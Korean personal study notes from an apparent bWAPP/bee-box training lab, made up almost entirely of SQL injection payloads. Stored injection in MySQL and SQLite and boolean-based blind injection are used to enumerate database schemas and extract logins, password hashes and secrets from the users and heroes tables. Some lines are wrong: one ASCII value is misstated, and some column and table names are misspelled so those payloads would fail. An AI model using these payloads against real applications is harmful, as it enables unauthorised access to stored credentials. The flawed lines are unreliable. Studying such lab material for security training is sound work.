mysql -u root -p  << mysql 들어가는 코드


DATABASE -> TABLE -> COLUMN -> 데이터 값
요 순서대로 볼거다.


vi sqli_7.php  << bee box 에서


use information_schema; << mysql 에서 입력 하면 들어가진다.
desc tables; << table 안에 모든것을 볼수잇다.

$sql = "INSERT INTO blog (date, entry, owner) VALUES (now(),'" . $entry . "','" . $owner . "')";

test', (select database())) #

test',(select table_name from information_schema.tables limit 0,1)) #
test',(select table_name from information_schema.tables limit 3,1)) #
test',(select table_name from information_schema.tables limit 11,1)) #

test',(select column_name from information_schema.columns where table_name="heroes"limit 0,1))#
test',(select column_name from information_schema.columns where table_name="heroes"limit 1,1))#
test',(select column_name from information_schema.columns where table_name="heroes"limit 2,1))#
test',(select column_name from information_schema.columns where table_name="heroes"limit 3,1))#

test',(select concat(login, password, secret) from heroes limit 0,1))#



SQL Injection - Stored (SQLite) < - ( 언제 넘어간다고 말햇지..ㅋㅋㅋㅋ )

$sql = "INSERT INTO blog (id, date, entry, owner) VALUES (" . ++$id . ",'" . date('Y-m-d', time()) . "','" . $entry . "','" . $owner . "');";

', (select sqlite_version())) -- <<

',(select tbl_name from sqlite_master limit 0,1 )) --
',(select tbl_name from sqlite_master limit 1,1 )) --
',(select tbl_name from sqlite_master limit 2,1 )) --
',(select tbl_name from sqlite_master limit 3,1 )) --

',(select sql from sqlite_master where tbl_name="users")) --

',(select login from users limit 0,1)) --
',(select password from users limit 0,1)) --
',(select secret from users limit 0,1)) --

',(select login from users limit 1,1)) --
',(select password from users limit 1,1)) --
',(select secret from users limit 1,1)) --


SQL Injection - Blind - Boolean-Based
(시간이 제일 오래 걸리는 Injection)

The movie does not exist in our database!  < 자기가 인증하는 database 는 출력  (참)


Incorrect syntax detected! < 작은 따옴표 넣엇을때 나오는 표시  (거짓)

$sql = "SELECT * FROM movies WHERE title = '" . sqli($title) . "'";


$sql = "SELECT * FROM movies WHERE title = 'or 1=1 and length(database())=1 #'";
The movie does not exist in our database!
$sql = "SELECT * FROM movies WHERE title = 'or 1=1 and length(database())=5 #'";
The movie exists in our database!

$sql = "SELECT * FROM movies WHERE title = 'or 1=1 and substring(database(),1,1)='b' #'";
The movie exists in our database!

[참고] 실습 함수

- length()                지정한 문자열의 길이를 반환
- length(database())=5

- substring()             지정한 문자열의 내용을 반환
- substring(database(),1,1)='b'

ex ) ' or 1=1 and length(database())=1 #
     ' or 1=1 and substring(database(),1,1)='b'#

     ' or 1=1 and substring(database(),2,1)='W'#
ex ) ' or 1=1 and substring(database(),2,1)<='W'#
     ' or 1=1 and substring(database(),2,1)<='Z'#
     ' or 1=1 and substring(database(),2,1)<='Y'#
     ' or 1=1 and substring(database(),2,1)<='X'#
     ' or 1=1 and substring(database(),2,1)<='V'#
     ' or 1=1 and substring(database(),2,1)<='A'#
$sql = "SELECT * FROM movies WHERE title = 'or 1=1 and substring(database(),2,1)<='W' #'";

     ' or 1=1 and ascii(substring(database(),2,1))<=90 #
     ' or 1=1 and ascii(substring(database(),2,1))<=86 #
     ' or 1=1 and ascii(substring(database(),2,1))<=87 #
$sql = "SELECT * FROM movies WHERE title = 'or 1=1 and ascii(substring(database(),2,1))<=90 #'";

정답 = ' or 1=1 and database()='bWAPP' #

      ' or 1=1 and length((select table_name from information_schema.table where table_schema='bWAPP' limit 3,1))=1 #
      ' or 1=1 and database()='bWAPP' #
      ' or 1=1 and database()='bWAPP' #
      ' or 1=1 and database()='bWAPP' #
      ' or 1=1 and database()='bWAPP' #
$sql = "SELECT * FROM movies WHERE title = 'or 1=1 and database()='bWAPP' #'";

' or 1=1 and ascii(substring((select table_name from information_schema.table where table_schema='bWAPP' limit 3,1),1,1))>=116 #

' or 1=1 and ascii(substring((select table_name from information_schema.table where table_schema='bWAPP' limit 3,1),1,1))>=117 #

' or 1=1 and ascii(substring((select table_name from information_schema.table where table_schema='bWAPP' limit 3,1),1,1))>=101 #

' or 1=1 and ascii(substring((select table_name from information_schema.table where table_schema='bWAPP' limit 3,1),1,1))>=114 #

' or 1=1 and ascii(substring((select table_name from information_schema.table where table_schema='bWAPP' limit 3,1),1,1))>=115 #

' or 1=1 and (select table_name from information_schema.tables where table_schema='bWAPP' limit 3,1)='users'#





u = 117
s = 115
e = 101
r = 113
s = 115

$sql = "SELECT * FROM movies WHERE title = #'";  < 이거 중요함
$sql = "SELECT * FROM movies WHERE title = 'or 1=1 and (select columns_name from information_schema.columns where table_name='users' limit 1,1)='login' #'";

desc tables;  < 디스크립션

select table_name from tables;  < 태이블
select table_schema from tables;

' or 1=1 and length((select column_name from information_schema.columns where table_name='users'limit 0,1))=1 #
' or 1=1 and ascii(substring((select columns_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105 #
' or 1=1 and ascii(substring((select columns_name from information_schema.columns where table_name='users' limit 0,1),1,1))=100 #

' or 1=1 and length((select column_name from information_schema.columns where table_name='users'limit 1,1))=5 #

l = 108
o = 111
g = 103
i = 105
n = 110

' or 1=1 and ascii(substring((select columns_name from information_schema.columns where table_name='users' limit 1,1),1,1))=108 #
' or 1=1 and ascii(substring((select columns_name from information_schema.columns where table_name='users' limit 1,1),2,1))=111 #
' or 1=1 and ascii(substring((select columns_name from information_schema.columns where table_name='users' limit 1,1),3,1))=103 #
' or 1=1 and ascii(substring((select columns_name from information_schema.columns where table_name='users' limit 1,1),4,1))=105 #
' or 1=1 and ascii(substring((select columns_name from information_schema.columns where table_name='users' limit 1,1),5,1))=110 #

' or 1=1 and (select columns_name from information_schema.columns where table_name='users' limit 1,1)='login' #

' or 1=1 and ascii(substring((select login from users limit 1,1),1,1))=3 #

' or 1=1 and ascii(substring((select login from users limit 1,1),1,1))=98#
' or 1=1 and ascii(substring((select login from users limit 1,1),2,1))=101#
' or 1=1 and ascii(substring((select login from users limit 1,1),3,1))=101#

' or 1=1 and (select login from users limit 1,1)="bee" #

b = 98
e = 101
e = 101

' or 1=1 and length((select password from users where login='bee'))=10 #
' or 1=1 and length((select password from users where login='bee'))=40 #

6885858486 f31043e583 9c735d9945 7f045affd0

' or 1=1 and md5("bug") = (select password from users where login='bee') #
' or 1=1 and sha1("bug") = (select password from users where login='bee') #
